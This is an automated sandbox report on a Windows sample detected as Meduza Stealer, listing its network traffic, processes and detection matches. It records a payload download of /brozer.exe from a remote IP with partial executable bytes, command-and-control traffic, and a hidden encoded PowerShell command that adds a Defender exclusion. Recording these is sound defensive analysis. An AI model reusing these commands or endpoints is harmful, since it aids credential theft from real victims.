Nov 15, 2024 10:29:30.257688999 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257690907 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257694006 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257700920 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257740974 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257786989 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257797956 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257807016 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257814884 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257826090 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257829905 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257839918 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257843971 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257859945 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257870913 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257879972 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257898092 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257898092 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257908106 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257920980 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257945061 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257947922 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257961035 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.257966995 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.257994890 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.258007050 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.258007050 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.258048058 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.258059025 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.258069992 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.258114100 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.258121014 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.258133888 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.258142948 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.258152962 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.258178949 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.258210897 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.298388958 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.298584938 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.298655033 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.298710108 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.298759937 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.298814058 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.298871994 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.298921108 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.298981905 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.299057961 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.299117088 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.299168110 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.299223900 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.299258947 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.346399069 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.346671104 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.346749067 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.346782923 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.346997976 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.347311020 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.347382069 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.347428083 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.351684093 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.351859093 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.369359016 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.369627953 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.370012999 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.370085001 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.370146036 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.370196104 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.370254993 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.370310068 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.370361090 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.370419979 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.370482922 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.370542049 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.370589018 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.370647907 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.374610901 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.374697924 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.418414116 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.418883085 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.418998957 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.419068098 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.419133902 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.419198990 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.419260025 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.419336081 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.419408083 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.419465065 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.419540882 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.470493078 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.470550060 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.508632898 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.508815050 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.508929968 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.508990049 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.509062052 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.514030933 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.514197111 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.554469109 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.554636955 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.591216087 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.591388941 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.591478109 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.591530085 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.596483946 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.596605062 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.596703053 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.638465881 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.638531923 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.675127983 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.675229073 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.675385952 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.675590038 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.675657988 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.675707102 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.675762892 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.675807953 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.675865889 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.675887108 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.680341005 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.680476904 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.722534895 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.722610950 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.751025915 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.751178980 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.751262903 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.751327038 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.751375914 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.751436949 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.751739979 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.751796961 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.751847029 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.751902103 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.751928091 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.756195068 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.756377935 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.756443977 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.756495953 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.756556988 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.756607056 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.756659985 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.756680012 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.802354097 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.802444935 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.825748920 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.825946093 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.826057911 CET	15666	49927	45.130.145.152	192.168.2.10
Nov 15, 2024 10:29:30.826335907 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.826395035 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.826445103 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.826498985 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.826549053 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.826601028 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.826654911 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.826706886 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.826756001 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.826811075 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.826863050 CET	49927	15666	192.168.2.10	45.130.145.152
Nov 15, 2024 10:29:30.826930046 CET	49927	15666	192.168.2.10	45.130.145.152

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 15, 2024 10:29:25.094077110 CET	192.168.2.10	1.1.1.1	0x532	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 15, 2024 10:28:46.773356915 CET	1.1.1.1	192.168.2.10	0x4013	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 10:28:46.773356915 CET	1.1.1.1	192.168.2.10	0x4013	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Nov 15, 2024 10:29:25.101210117 CET	1.1.1.1	192.168.2.10	0x532	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Nov 15, 2024 10:29:25.101210117 CET	1.1.1.1	192.168.2.10	0x532	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Nov 15, 2024 10:29:25.101210117 CET	1.1.1.1	192.168.2.10	0x532	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49762	150.241.95.163	80	7796	C:\Users\user\Desktop\HZ1BUCfTne.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 10:28:57.237636089 CET	74	OUT	GET /brozer.exe HTTP/1.1 Host: 150.241.95.163 Connection: Keep-Alive
Nov 15, 2024 10:28:58.078705072 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Fri, 15 Nov 2024 09:28:57 GMT Content-Type: application/octet-stream Content-Length: 2632704 Last-Modified: Thu, 14 Nov 2024 19:32:03 GMT Connection: keep-alive ETag: "67365033-282c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 54 97 d1 e9 35 f9 82 e9 35 f9 82 e9 35 f9 82 f9 b1 fa 83 e1 35 f9 82 f9 b1 fd 83 e6 35 f9 82 f9 b1 fc 83 ba 35 f9 82 a2 4d fc 83 48 35 f9 82 a2 4d fa 83 ee 35 f9 82 a2 4d fd 83 fa 35 f9 82 d1 b5 fc 83 eb 35 f9 82 a1 b0 fd 83 cd 35 f9 82 a2 4d f8 83 e2 35 f9 82 e9 35 f8 82 68 35 f9 82 a2 b0 f0 83 fa 35 f9 82 a2 b0 06 82 e8 35 f9 82 a2 b0 fb 83 e8 35 f9 82 52 69 63 68 e9 35 f9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 e8 4f 34 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 6a 03 00 00 d6 24 00 00 00 00 00 f0 d0 02 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$T555555MH5M5M555M55h5555Rich5PEdO4g")j$@(`T'd`(0(p,p(P'8'@.texthj `.rdatap$r$n@@.data(('@.pdatap,0(.'@@.rsrc`( (@@.relocPp("(@B
Nov 15, 2024 10:28:58.078810930 CET	52	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 83 ec 28 Data Ascii: H(
Nov 15, 2024 10:28:58.078821898 CET	1236	IN	Data Raw: 48 8d 0d 55 12 28 00 e8 a0 17 03 00 48 8d 0d d9 67 03 00 48 83 c4 28 e9 e8 bd 02 00 48 8d 0d 31 68 03 00 e9 dc bd 02 00 48 8d 0d c9 67 03 00 e9 d0 bd 02 00 48 83 ec 28 48 8d 0d 9d 14 28 00 e8 68 17 03 00 48 8d 0d 89 68 03 00 48 83 c4 28 e9 b0 bd Data Ascii: HU(HgH(H1hHgH(H(hHhH(H9h@WAVHhH'H3HD$HLH+HuH$Hl$`H@H:>MZf9HcG<=zHH
Nov 15, 2024 10:28:58.078865051 CET	1236	IN	Data Raw: 48 89 7c 24 28 48 85 c0 0f 84 c7 00 00 00 0f b7 70 14 48 83 c6 18 48 03 f0 48 89 74 24 28 44 0f b7 f7 66 89 7c 24 20 90 66 45 3b 77 06 73 26 41 b8 08 00 00 00 48 8b d6 49 8b cd e8 70 e0 01 00 85 c0 75 6a 8b 46 0c 49 03 c4 48 89 43 10 8b 46 08 48 Data Ascii: H\|$(HpHHHt$(Df\|$ fE;ws&AHIpujFIHCFHCHKHthHCHt_LCI;rVLM+LI;wHHsHHrmH;tZHKHHKHCHHCLH(Ht$(fAfDt$ bH{H{%H{H{\|$$D
Nov 15, 2024 10:28:58.078876972 CET	1236	IN	Data Raw: ec 48 48 8b 05 cb f0 27 00 48 33 c4 48 89 45 f0 44 8b ea 4c 8b e1 e8 f9 fc ff ff 48 8b d8 48 85 c0 75 0a b8 bb 00 00 c0 e9 da 01 00 00 33 c0 48 89 74 24 78 48 89 bc 24 80 00 00 00 4c 8d 45 e0 48 89 45 d8 48 8d 7d d8 89 45 e0 48 8d 55 dc b9 0c 00 Data Ascii: HH'H3HEDLHHu3Ht$xH$LEHEH}EHUL\|$@HMh3}u}uAAEtH\3L$D3H}HELEEHUuHMh}u}uD;sE
Nov 15, 2024 10:28:58.078887939 CET	1236	IN	Data Raw: c0 0f 11 02 48 8d 48 08 e8 ef cc 02 00 90 48 8d 05 8b d5 04 00 48 89 03 48 8b c3 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 48 8d 0d c5 42 07 00 e8 24 0b 03 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 Data Ascii: HHHHHH [H(HB$@SH@H'H3HD$8LHHL$ HzvLHHHQWLD$(D$0HL$(ZH&HHHL$8H3H@[HL$SH HHHHHSW
Nov 15, 2024 10:28:58.078897953 CET	208	IN	Data Raw: 48 8b 5c 24 50 48 83 c4 20 41 5e 5f 5e c3 e8 35 e0 01 00 cc e8 83 fa ff ff cc e8 3d fb ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 55 56 57 41 57 48 83 ec 20 48 8b 69 18 49 8b f0 4c 8b fa 48 8b d9 4c 3b c5 77 2a 48 8b f9 48 83 fd 0f 76 03 Data Ascii: H\$PH A^_^5=@SUVWAWH HiILHL;wHHvH9HqH{:H>H A__^][HH;HLt$hHH;wEHHHH+H;w4HHH;HBHOHuE3IHr8HA
Nov 15, 2024 10:28:58.078958988 CET	1236	IN	Data Raw: 27 48 3b c1 0f 86 a3 00 00 00 eb 0e 48 b8 00 00 00 00 00 00 00 80 48 83 c0 27 48 8b c8 e8 0e aa 02 00 48 85 c0 74 7a 4c 8d 70 27 49 83 e6 e0 49 89 46 f8 eb 08 e8 f6 a9 02 00 4c 8b f0 4c 8b c6 48 89 73 10 49 8b d7 48 89 7b 18 49 8b ce e8 b9 39 03 Data Ascii: 'H;HH'HHtzLp'IIFLLHsIH{I9A6Hv-HHUHrLAH'I+HAHwIqL3HLt$hH A__^][HT$SH0H3D$ HQ(WHCHCI@IB8
Nov 15, 2024 10:28:58.079035997 CET	1236	IN	Data Raw: 24 28 00 00 00 00 48 8b 5c 24 20 48 89 5c 24 28 48 8b cb e8 9c 02 03 00 48 8b 13 48 8b cb ff 52 08 48 89 1d 80 ff 27 00 48 c7 44 24 28 00 00 00 00 48 8d 4c 24 30 e8 39 ff 02 00 48 8b c3 48 8b 4c 24 38 48 33 cc e8 7d a2 02 00 48 8b 5c 24 68 48 8b Data Ascii: $(H\$ H\$(HHHRH'HD$(HL$09HHL$8H3}H\$hHl$pH@A^_^u@SVATAUAWH0LyHL$HI+MHH;>Hl$pHiH\|$(Lt$ N4:IHH;wDHHHH+H;w3H)HH;HBHKHu3MH
Nov 15, 2024 10:28:58.079046965 CET	1236	IN	Data Raw: 48 8b 05 2d 34 07 00 ff d0 90 48 83 c4 28 c3 cc cc cc cc cc 40 53 48 83 ec 20 48 8b ca 49 8b d8 ff 15 6e 52 03 00 48 85 c0 74 12 48 8b d3 48 8b c8 48 83 c4 20 5b 48 ff 25 77 52 03 00 48 83 c4 20 5b c3 cc 48 89 5c 24 08 55 56 57 41 54 41 55 41 56 Data Ascii: H-4H(@SH HInRHtHHH [H%wRH [H\$UVWATAUAVAWHHHO'H3HEIH]LHULHMI 3HSWEHuHuLIB84uHHM{IFHXLLuLe{uTLm@f
Nov 15, 2024 10:28:58.083774090 CET	1236	IN	Data Raw: 44 88 5c 24 70 4d 8b c6 4c 89 7c 24 30 48 89 6c 24 28 48 85 ff 0f 84 f5 02 00 00 bd 0b 02 00 00 4d 85 c0 0f 84 e7 02 00 00 4c 3b c7 0f 82 de 02 00 00 49 8b c0 48 2b c7 48 8d 48 14 48 3b ce 0f 87 cb 02 00 00 48 83 f9 14 0f 82 c1 02 00 00 48 3b c8 Data Ascii: D\$pML\|$0Hl$(HML;IH+HHH;HH;EEuE9HA@L$8HHffHWHH;vH;mHcHAH;Vt,!<\EHExEAAEL+fD;@HLwM

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49928	172.67.74.152	443	1440	C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-15 09:29:26 UTC	100	OUT	GET / HTTP/1.1 Accept: text/html; text/plain; / Host: api.ipify.org Cache-Control: no-cache
2024-11-15 09:29:26 UTC	399	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 09:29:26 GMT Content-Type: text/plain Content-Length: 14 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8e2e3782a81eeafe-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1084&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=738&delivery_rate=2588025&cwnd=241&unsent_bytes=0&cid=c45370ef7e7001a1&ts=564&x=0"
2024-11-15 09:29:26 UTC	14	IN	Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 39 Data Ascii: 173.254.250.89

Target ID:	0
Start time:	04:28:48
Start date:	15/11/2024
Path:	C:\Users\user\Desktop\HZ1BUCfTne.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\HZ1BUCfTne.exe"
Imagebase:	0x6b0000
File size:	73'555'456 bytes
MD5 hash:	D9ECF06C01F13E20C692308977343E6C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:28:59
Start date:	15/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAWgByAEYAZABqAHkAbQBIADEAcgBcAHMAVQBLAEYAcABoAEgAUwB6AFgALgBlAHgAZQAnAA==
Imagebase:	0x510000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:28:59
Start date:	15/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:29:03
Start date:	15/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6616b0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:29:23
Start date:	15/11/2024
Path:	C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe"
Imagebase:	0x7ff6cfa30000
File size:	2'632'704 bytes
MD5 hash:	183E24B654414D7BE786CCD8E6A108A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MeduzaStealer, Description: Yara detected Meduza Stealer, Source: 00000009.00000002.1754077299.0000020933380000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MeduzaStealer, Description: Yara detected Meduza Stealer, Source: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 29%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	154
Total number of Limit Nodes:	17

Executed Functions

Function 0909A510 Relevance: 1.9, Strings: 1, Instructions: 693
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fff?, xrefs: 0909AB77

Memory Dump Source

Source File: 00000000.00000002.2393760645.0000000009090000.00000040.00000800.00020000.00000000.sdmp, Offset: 09090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9090000_HZ1BUCfTne.jbxd

Similarity

API ID:
String ID: fff?
API String ID: 0-4136771917
Opcode ID: d157c06bbe5f8d5461157c52e586e939d6030beba76a423a177c0a97d2cf8828
Instruction ID: 3a91996fd3767609fd8470f17bcd986cf143f8c19a0fbe4bed82ec51cd160e62
Opcode Fuzzy Hash: d157c06bbe5f8d5461157c52e586e939d6030beba76a423a177c0a97d2cf8828
Instruction Fuzzy Hash: 92621831810A1ADFCF11DF50C884AD9B7B2FF99304F1586D5E9096B225E7B1AAD5CF80

Function 0909A500 Relevance: 1.7, Strings: 1, Instructions: 454
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fff?, xrefs: 0909AB77

Memory Dump Source

Source File: 00000000.00000002.2393760645.0000000009090000.00000040.00000800.00020000.00000000.sdmp, Offset: 09090000, based on PE: false

